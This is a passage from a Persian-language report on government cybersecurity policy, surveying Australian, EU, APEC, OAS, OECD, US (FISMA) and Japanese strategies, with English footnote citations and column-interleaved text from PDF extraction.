ﺧﺼﻮﺻﻲ ﺩﺭ ﺧﺼﻮﺹ ﺗﻬﻴﺔ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ ﻣﻨﺘـﺸﺮ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﺳﺘﺮﺍﻟﻴﺎ ﺍﺷﺎﺭﻩ ﻛﺮﺩ.
٤٨
ﺳﺎﺧﺖ. ﺩﺭ ﺳﻄﺢ ﻣﻨﻄﻘﻪﺍﻱ ﻧﻴﺰ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﺍﻳﻦ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎ ﻓﻌﺎﻟﻴﺘﻬـﺎﻳﻲ
ﺑﻌﺪ ﺍﺯ ﻫﻤﺔ ﺍﻳﻦ ﺗﻼﺷﻬﺎ ،ﻳﻚ ﻣﺠﻤﻮﻋﺔ ﻣﻮﺿـﻮﻋﻲ ﻫﻤﺎﻫﻨـﮓ ﻭ ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ ﺍﺳﺖ .ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺧﻮﺩ
ﻳﻜﭙﺎﺭﭼــﻪ ﺍﺯ ﺍﺳــﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴــﺖ ﺳــﺎﻳﺒﺮ ﺩﺭ ﺳــﻄﻮﺡ ﻣﻠــﻲ، ﺭﺍ ﻧﻪ ﺗﻨﻬﺎ ﺩﺭ ﻳﻚ ﺳﻨﺪ ﻭﺍﺣﺪ ،ﺑﻠﻜﻪ ﻃﻲ ﭼﻨـﺪﻳﻦ ﺳـﺎﻝ ﺩﺭ ﻳـﻚ
ﻣﻨﻄﻘﻪﺍﻱ ﻭ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺑﺪﺳﺖ ﺁﻣﺪﻩ ﺍﺳﺖ: ﺳﻠﺴﻠﻪ ﺍﺳﻨﺎﺩ ﻣﺮﺑﻮﻁ ﺑﻪ ﻃﺮﺣﻬﺎﻱ ﭘﻴﺸﻨﻬﺎﺩﻱ ﻛﻤﻴـﺴﻴﻮﻥ ﺍﺭﻭﭘـﺎ
٤١ ٤٠
ﻣﻨﺘﺸﺮ ﺳﺎﺧﺖ .ﺳﺎﺯﻣﺎﻥ ﻫﻤﻜﺎﺭﻱ ﺍﻗﺘـﺼﺎﺩﻱ ﺁﺳـﻴﺎ)(APEC
ﻣﺸﺎﺭﻛﺖ ﺑﺨﺸﻬﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ •
ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻣﻨﻄﻘﻪﺍﻱ ﻛﻪ ﺗﻮﺳـﻂ ﮔـﺮﻭﻩ ﻛـﺎﺭﻱ
ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺒﺮ ﻧﻴﺎﺯﻣﻨـﺪ ﻫﻤﻜـﺎﺭﻱ ﺑﺨـﺸﻬﺎﻱ ﻋﻤـﻮﻣﻲ ﻭ
ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺭﺍﻩ ﺩﻭﺭ ) ٤٢(TELﻭ ﺑـﺎ ﻣـﺸﺎﺭﻛﺖ ﻓﻌـﺎﻝ
ﺧﺼﻮﺻﻲ ﺍﺳﺖ ٤٩.ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﻣـﺴﺌﻮﻟﻴﺖ ﺍﺻـﻠﻲ
ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﺎﺯﻧﻮﻳﺴﻲ ﺷﺪﻩ ﺭﺍ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ ٤٣.ﺳﺎﺯﻣﺎﻥ
ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻣﻨﻴﺖ ﺳﻴـﺴﺘﻤﻬﺎ ﻭ ﺷـﺒﻜﻪﻫـﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﺮ
ﺍﻳﺎﻟﺘﻬﺎﻱ ﺁﻣﺮﻳﻜﺎ ) ٤٤(OASﻣﺴﺌﻮﻟﻴﺖ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﻨﻄﻘﻪﺍﻱ ﺭﺍ ﻧﻴﺰ
ﻋﻬﺪﻩ ﺩﺍﺭﺩ.
ﺑــﺮ ﻋﻬــﺪﻩ ﺩﺍﺭﺩ ٤٥.ﺩﺭ ﮊﻭﺋــﻦ ۲۰۰۳ﻣﺠﻤــﻊ ﻋﻤــﻮﻣﻲ ﺳــﺎﺯﻣﺎﻥ
ﺁﮔﺎﻫﻲ ﻋﻤﻮﻣﻲ • ﺍﻳﺎﻟﺘﻬﺎﻱ ﺁﻣﺮﻳﻜـﺎ ﻗﻄﻌﻨﺎﻣـﻪﺍﻱ ﺑـﺮﺍﻱ ﺗﻬﻴـﺔ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺩﺍﺧﻠـﻲ
"ﺍﺳــﺘﻔﺎﺩﻩ ﻛﻨﻨــﺪﮔﺎﻥ ﺍﺯ ﺷــﺒﻜﻪ ﺍﺯ ﺟﻤﻠــﻪ ﺗﻮﻟﻴﺪﻛﻨﻨــﺪﮔﺎﻥ،
ﺭﺍﻫﺒﺮﺍﻥ ،ﺍﭘﺮﺍﺗﻮﺭﻫﺎ ﻭ ﻳﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺷﺨﺼﻲ ﺑﺎﻳﺪ ﻧـﺴﺒﺖ ﺑـﻪ 39 E-Security National Agenda [Australia],
September 2001,
ﺗﻬﺪﻳﺪﺍﺕ ﻭﺍﺭﺩﻩ ﻭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺷـﺒﻜﻪ ﺁﮔـﺎﻩ ﺑﺎﺷـﻨﺪ ﻭ http://www.noie.gov.au/projects/confidence/Pr
otecting/nat_agenda.htm
40 European Commission, Proposal for a
46 Development of an Inter-American Strategy to Regulation of the European Parliament & of
ﺑﺨﺶ ﭼﻬﺎﺭﻡ
ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴـﺎﺗﻲ ﻭ ﺟـﺮﺍﺋﻢ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺁﻣـﻮﺯﺵ ﻣﺴﺌﻮﻟﻴﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺷﺒﻜﻪ ﺭﺍ ﺑﺮ ﺍﺳﺎﺱ ﻣﻮﻗﻌﻴﺘﻬﺎ ﻭ ﻧﻘﺶ
٥٠
ﺩﻫﻨﺪ". ﺧﻮﺩ ﺑﺮ ﻋﻬﺪﻩ ﮔﻴﺮﻧﺪ".
٥٢
ﺍﻫﻤﻴﺖ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ • ﺗﺠﺮﺑﻴﺎﺕ ،ﺭﺍﻫﺒﺮﺩﻫﺎ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ •
ﺷﺒﻜﻪﻫﺎﻱ ICTﺩﺍﺩﻩﻫـﺎﻱ ﺑـﺴﻴﺎﺭ ﺣـﺴﺎﺱ ﺷﺨـﺼﻲ ﺭﺍ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑﺎﻳﺪ ﺑﺮ ﺍﺳﺎﺱ ﺗﻌﺪﺍﺩ ﺭﻭ ﺑﻪ ﺭﺷﺪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ
ﺍﻧﺘﻘﺎﻝ ﻣﻲ ﺩﻫﻨﺪ ﻭ ﺫﺧﻴﺮﻩ ﻣﻲﺳﺎﺯﻧﺪ .ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺟﺰﺀ ﻭ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ،ﺑـﺼﻮﺭﺕ ﺩﺍﻭﻃﻠﺒﺎﻧـﻪ ﻭ ﻣﺒﺘﻨـﻲ ﺑـﺮ
ﺿﺮﻭﺭﻱ ﺍﻋﺘﻤﺎﺩ ﺩﺭ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺍﺳـﺖ ﻭ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻭﻓﺎﻕ ﺟﻤﻌﻲ ﺗﻬﻴﻪ ﺷﻮﺩ ﻭ ﺗﺠﺮﺑﻴﺎﺕ ﺍﺯ ﻃﺮﻳـﻖ ﻣﺆﺳـﺴﺎﺕ
ﺍﻣﻨﻴﺖ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﺎﻳﺪ ﺑﻪ ﺭﻭﺷﻬﺎﻱ ﺳﺎﺯﮔﺎﺭ ﺑﺎ ﺍﺭﺯﺷﻬﺎﻱ ﻣﺸﺎﻭﺭ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺑﻴﻦ ﺍﻟﻤﻠﻠـﻲ ﺗﻮﺳـﻌﻪ ﻳﺎﺑـﺪ.
٥٣
ﻣﻬﻢ ﺟﺎﻣﻌﻪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﻮﺩ. ﺍﻳﻦ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺭﺍﻫﻨﻤﺎﻱ ﻣﻬﻤﻲ ﺑﺮﺍﻱ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﺍﺧﻠﻲ
ﺩﻭﻟﺖ ﻫﺴﺘﻨﺪ .ﺩﻭﻟﺖ ﻧﻴﺎﺯﻱ ﻧﺪﺍﺭﺩ ﻭ ﻧﺒﺎﻳـﺪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ
ﺍﺭﺯﻳﺎﺑﻲ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ،ﻫﺸﺪﺍﺭ ﻭ ﻋﻜﺲﺍﻟﻌﻤﻞ • ٥١
ﻓﻨﻲ ﺑﺮﺍﻱ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺗﻌﻴﻴﻦ ﻛﻨﺪ.
ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻫﻤﻜـﺎﺭﻱ ﺍﻗﺘـﺼﺎﺩﻱ
ﺁﺳﻴﺎ ﺍﺑﺮﺍﺯ ﺩﺍﺷﺖ" :ﻣﺒﺎﺭﺯﺓ ﻣﺆﺛﺮ ﺑﺎ ﺗﺨﻠﻔﺎﺕ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ •
ﻭ ﺣﻔﺎﻇـــﺖ ﺍﺯ ﺍﻃﻼﻋـــﺎﺕ ﺯﻳﺮﺳـــﺎﺧﺘﻲ ،ﻭﺍﺑـــﺴﺘﻪ ﺑـــﻪ ﻼ ﻣﺸﺨﺺ ﺷﺪﻩ ﻛﻪ ﺗﻼﺵ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻛﺎﻣ ﹰ
ﺍﻗﺘــﺼﺎﺩﻫﺎﻳﻲ ﺍﺳــﺖ ﻛــﻪ ﺳﻴــﺴﺘﻤﻬﺎﻳﻲ ﺑــﺮﺍﻱ ﺍﺭﺯﻳــﺎﺑﻲ ﺑﺎ ﺑﻲﺗﻮﺟﻬﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻧﺴﺒﺖ ﺑﻪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺣﻤـﻼﺕ
ﺗﻬﺪﻳﺪﻫﺎ ﻭ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎ ﺩﺍﺭﻧـﺪ ﻭ ﻫـﺸﺪﺍﺭﻫﺎﻱ ﻻﺯﻡ ﺭﺍ ﻣﻮﺍﺟﻪ ﺷﺪﻩ ﺍﺳـﺖ .ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﺑﺎﻳـﺪ
ﺻﺎﺩﺭ ﻣﻲﻛﻨﻨﺪ .ﺑﺎ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﺗﺸﻮﻳﻖ ﺷﻮﻧﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺎ ﺳـﺎﻳﺮ
ﻳﻚ ﺗﻬﺪﻳﺪ ﻗﺒﻞ ﺍﺯ ﺁﻧﻜﻪ ﻣﻮﺟﺐ ﺁﺳﻴﺐ ﮔﺴﺘﺮﺩﻩﺍﻱ ﺷـﻮﺩ، ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﻳﻦ ﺑﺨﺶ ،ﺑﺎ ﺩﻭﻟﺖ ،ﻭ ﻧﻴﺰ ﺑﺎ ﺳـﺎﻳﺮ ﻛـﺸﻮﺭﻫﺎ
ﺷﺒﻜﻪﻫﺎ ﺑﻬﺘﺮ ﻣﺤﺎﻓﻈﺖ ﻣﻲﺷﻮﻧﺪ ٥٤".ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻳﺎﻻﺕ ﺑﻪﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﻧﺪ.
ﻣﺘﺤﺪﻩ ﺍﺯ ﻋﻤﻮﻡ ﺻﺎﺣﺒﻨﻈﺮﺍﻥ ﺧﻮﺍﺳﺘﻪ ﺑﻮﺩ ﺩﺭ ﺍﻳﺠﺎﺩ ﻳـﻚ
ﺁﻣﻮﺯﺵ ﻭ ﭘﺮﻭﺭﺵ •
ﺳﻴﺴﺘﻢ ﻛﻪ ﺩﺭ ﺳﻄﺢ ﻣﻠﻲ ﭘﺎﺳﺨﮕﻮﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑﺎﺷـﺪ
ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻫﻤﻜﺎﺭﻱ ﺍﻗﺘﺼﺎﺩﻱ ﺁﺳـﻴﺎ )(APEC
ﻣﺸﺎﺭﻛﺖ ﻛﻨﻨﺪ ﺗﺎ ﺣﻤﻼﺕ ﻭﺍﺭﺩ ﺑﻪ ﺷـﺒﻜﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ
ﻣﻲﮔﻮﻳﺪ" :ﺗﻮﺳﻌﺔ ﻣﻨﺎﺑﻊ ﺍﻧـﺴﺎﻧﻲ ﺑـﺮﺍﻱ ﺑـﻪ ﺛﻤـﺮ ﺭﺳـﻴﺪﻥ
ﺑﺴﺮﻋﺖ ﺷﻨﺎﺳﺎﻳﻲ ﺷﻮﻧﺪ.
ﺗﻼﺷﻬﺎ ﺩﺭ ﺟﻬﺖ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴـﺖ ﺍﻣـﺮﻱ ﺿـﺮﻭﺭﻱ
ﻫﻤﻜﺎﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ • ﺍﺳﺖ .ﺑﻤﻨﻈﻮﺭ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ،ﺩﻭﻟﺘﻬـﺎ ﻭ
ﺑﺮﺍﻱ ﺳﺎﺩﻩﺗﺮ ﻛـﺮﺩﻥ ﺗﺒـﺎﺩﻝ ﻧﻈـﺮ ﻭ ﻫﻤﻜـﺎﺭﻱ ﺩﺭ ﻣـﻮﺭﺩ ﺷﺮﻛﺘﻬﺎﻱ ﻫﻤﻜﺎﺭ ﺁﻧﻬﺎ ﺑﺎﻳـﺪ ﻛﺎﺭﻛﻨـﺎﻥ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﻣـﻮﺭﺩ
ﮔﺴﺘﺮﺵ ﻳﻚ "ﻓﺮﻫﻨﮓ ﺍﻣﻨﻴﺘـﻲ" ﻣﻴـﺎﻥ ﺩﻭﻟـﺖ ﻭ ﺑﺨـﺶ ﻣﻮﺿــﻮﻋﺎﺕ ﭘﻴﭽﻴــﺪﺓ ﻓﻨــﻲ ﻭ ﻗــﺎﻧﻮﻧﻲ ﺑــﺎ ﭘــﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ
ﺧﺼﻮﺻﻲ ﺩﺭ ﺳﻄﺢ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ،ﺩﻭﻟﺘﻬﺎ ﺑﺎﻳـﺪ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ
ﻫﻤﻜﺎﺭﻱ ﻛﻨﻨﺪ ﺗـﺎ ﺑـﺮﺍﻱ ﺟـﺮﺍﺋﻢ ﺩﻧﻴـﺎﻱ ﺳـﺎﻳﺒﺮ ﻗـﻮﺍﻧﻴﻦ
ﺳــﺎﺯﮔﺎﺭﻱ ﺑــﻪ ﺗــﺼﻮﻳﺐ ﺑﺮﺳــﺎﻧﻨﺪ ﻭ ﻧﻴﺮﻭﻫــﺎﻱ ﺍﻧﺘﻈــﺎﻣﻲ 50 APEC Cybersecurity Strategy,
http://www.apecsec.org.sg/content/apec/apec
_groups/working_groups/telecommunications
_and_information.html
Council of European Union, Council
Resolution of 28 January 2002 on a common
approach & specific actions in the area of
network & information security, (2002/C 43/02),
52 Respect for Privacy http://www.europa.eu.int/information_society/e
53 OECD Guidelines for the Security of europe/action_plan/safe/netsecres_en.pdf
Information Systems and Networks: Towards ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻫﻢ ﺩﺭ ﻣﻮﺭﺩ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﺘﻲ ۵۱
a Culture of Security, July 25, 2002,
http://www.oecd.org/pdf/M00034000/M000340 ﻭ ﻫﻢ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺍﺳﺖ ،ﺍﻣﺎ ﭼﻨـﻴﻦ ﻣـﻲﮔﻮﻳـﺪ ﻛـﻪ
00.pdf ﺩﻭﻟﺖ ﻧﺒﺎﻳﺪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺗﺤﻤﻴـﻞ
ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴـﺸﺘﺮ ﺑـﻪ ﺁﺩﺭﺳـﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﭘـﺎﻭﺭﻗﻲ ﺷـﻤﺎﺭﻩ ۴۸ ﻛﻨﺪ .ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﻣﻨﺒﻊ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ:
ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ. The National Strategy to Secure Cyberspace
54 APEC Cybersecurity Strategy, [U.S.], February 2003, pp. 11, 15
http://www.apecsec.org.sg/content/apec/apec http://www.whitehouse.gov/pcipb
_groups/working_groups/telecommunications http://www.dhs.gov/interweb/assetlibrary/Natio
_and_information.html nal_Cyberspace_Strategy.pdf
٢٤١ ﺑﺨﺶ ﭼﻬﺎﺭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﻛﻨﺪ ٦٠.ﺩﺭ ﺗﻮﻧﺲ ﻧﻴﺰ ﻣﺸﺎﺑﻪ ﻫﻤﻴﻦ ﻣـﺴﺌﻠﻪ ﺻـﻮﺭﺕ ﭘـﺬﻳﺮﻓﺖ ﻭ ﻛﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺑﺎﻳﺪ ﺍﺯ ﻃﺮﻳﻖ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠـﻲ
٥٥
ﺩﻭﻟﺖ ﺩﺭ ﺳﺎﻝ ۲۰۰۲ﻗﻮﺍﻧﻴﻨﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﺗﺼﻮﻳﺐ ﻭ ﺍﺑﻼﻍ ﺑﻪ ﻳﻜﺪﻳﮕﺮ ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ.
ﻛﺮﺩ ﻛﻪ ﻃﺒﻖ ﺁﻥ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﻣﻮﻇـﻒ ﺑﻮﺩﻧـﺪ ﺑـﺼﻮﺭﺕ
ﺭﻭﻧﺪ ﺗﻮﺳﻌﻪ ﻭ ﺍﺟﺮﺍﻱ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑـﺮﺍﻱ ﺩﻭﻟـﺖ،
ﺳﺎﻟﻴﺎﻧﻪ ﻣﻮﺭﺩ ﻣﻤﻴﺰﻱ ٦١ﺳﺎﻟﻴﺎﻧﺔ ﺍﻣﻨﻴﺘﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ.
ﻋﻨﺎﺻﺮ ﻣﺸﺘﺮﻛﻲ ﺑﺎ ﺗﻮﺳﻌﻪ ﻭ ﺍﺟـﺮﺍﻱ ﺑﺮﻧﺎﻣـﺔ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ ﺩﺭ
ﺳﺎﻳﺮ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﺍﻓﺮﺍﺩ ﺣﻘﻮﻗﻲ ﺩﺍﺭﺩ:
ﭘﻴﺎﺩﻩﺳـﺎﺯﻱ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ ﺩﺭ
ﺍﺭﺯﻳﺎﺑﻲ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ؛ •
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﺘﻲ -ﺭﺍﻫﻜﺎﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ
ﺍﻓﺰﺍﻳﺶ ﺳﻄﺢ ﺁﮔﺎﻫﻲ؛ •
ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺩﻭﻟﺖ ﮔﻤــﺎﺭﺩﻥ ﻳﻜﻨﻔــﺮ ﺑﻌﻨــﻮﺍﻥ ﻓﺮﻣﺎﻧــﺪﻩ ﺑــﺮﺍﻱ ﺍﻳﺠــﺎﺩ •
ﺑﺎ ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮﻱ ﻣﺸﺨﺺ ﺷﺪﻩ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﻣﺼﻮﺑﺔ ﻣـﺪﻳﺮﻳﺖ ﻫﻤﺎﻫﻨﮕﻲ ﺩﺭ ﺳﻴﺎﺳﺘﻬﺎ؛
٦٢ ٥٦
ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ )ﻣﺼﻮﺏ ﺳﺎﻝ (۲۰۰۲ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷـﺪﻩ ﺍﺳـﺖ. ﺗﻮﺳﻌﺔ ﺑﺮﻧﺎﻣﺔ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﻩ ؛ •
ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﺑﺮﺧﻲ ﺭﻭﺷﻬﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺭﺍ ﺑـﻪ ﺗﻄﺒﻴﻖ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻨﺎﺳﺐ؛ •
ﺗﺼﻮﻳﺮ ﻣﻲ ﻛﺸﺪ ﻛﻪ ﺑﺎﻋﺚ ﻣـﻲﺷـﻮﻧﺪ ﺩﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠـﻒ ﺗﻮﺟﻴﻪ ﺳﺎﺧﺘﺎﺭﻱ؛ ﻭ •
"ﭘﺎﺳﺨﮕﻮﻳﻲ" ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ. ﺍﺭﺯﻳﺎﺑﻲ ﻣﺠﺪﺩ ﺩﻭﺭﻩﺍﻱ ﻭ ﺍﺭﺗﻘﺎﻱ ﻣﺪﺍﻭﻡ. •
ﻫﺪﻑ ﻣﺸﺨﺺ FISMAﻣﺪﻳﺮﻳﺖ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺩﺭ ﮔـﺴﺘﺮﺓ ﻓــﺎﺯ ﭼﻬــﺎﺭﻡ )ﺑــﺎ ﺗﻤﺮﻛــﺰ ﺑــﺮ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴــﺖ ﺩﻭﻟﺘــﻲ( ﺍﻋــﻼﻡ
ﺩﻭﻟﺖ ﺍﺳﺖ ،ﻭ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻫﻤﺔ ﺗﻼﺷﻬﺎﻱ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺑـﺮﺍﻱ ﺧﻂﻣﺸﻲﻫﺎﻱ ﻭ ﺗﺼﻮﻳﺐ ﻗﻮﺍﻧﻴﻦ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺍﺳـﺖ.
ﺍﻳﻤــﻦﺳــﺎﺯﻱ ﺍﻃﻼﻋــﺎﺕ ﺑــﺎ ﻳﻜــﺪﻳﮕﺮ ﻫﻤﺎﻫﻨــﮓ ﺷــﻮﻧﺪ ﻭ ﻧﻴــﺰ ﺑﺮﺧــﻲ ﻛــﺸﻮﺭﻫﺎ ﻣﺜــﻞ ﮊﺍﭘــﻦ ﻭ ﺍﻳﺘﺎﻟﻴــﺎ ﺍﺯ ﻃﺮﻳــﻖ ﭼﻨــﻴﻦ
ﺭﺍﻫﻜﺎﺭﻱ ﺑﺮﺍﻱ ﺗﻬﻴﻪ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺣﺪﺍﻗﻞ ﻛﻨﺘﺮﻟﻬﺎﻱ ﻻﺯﻡ ﺟﻬـﺖ ﺧﻂﻣﺸﻲﻫﺎﻳﻲ ﺑﻪ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﭘﺮﺩﺍﺧﺘـﻪﺍﻧـﺪ .ﺩﺭ ﺟـﻮﻻﻱ ﺳـﺎﻝ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺩﻭﻟـﺖ ﺍﺭﺍﺋـﻪ ﮔـﺮﺩﺩ .ﻗـﺎﻧﻮﻥ ۲۰۰۰ﻛﻤﻴﺘﺔ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﮊﺍﭘـﻦ ﺩﺭ ﺳـﻄﺢ
ﺗﺼﺪﻳﻖ ﻣﻲﻛﻨﺪ ﻛـﻪ ﻣﺤـﺼﻮﻻﺕ ﺗﺠـﺎﺭﻱ ﺭﺍﻩﺣﻠﻬـﺎﻱ ﻣـﺆﺛﺮ ﻭ ﻛﺎﺑﻴﻨﻪ ﺭﺍﻫﺒﺮﺩﻫﺎﻳﻲ ﺩﺭ ﻣﻮﺭﺩ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ
ﺑﺨﺶ ﭼﻬﺎﺭﻡ
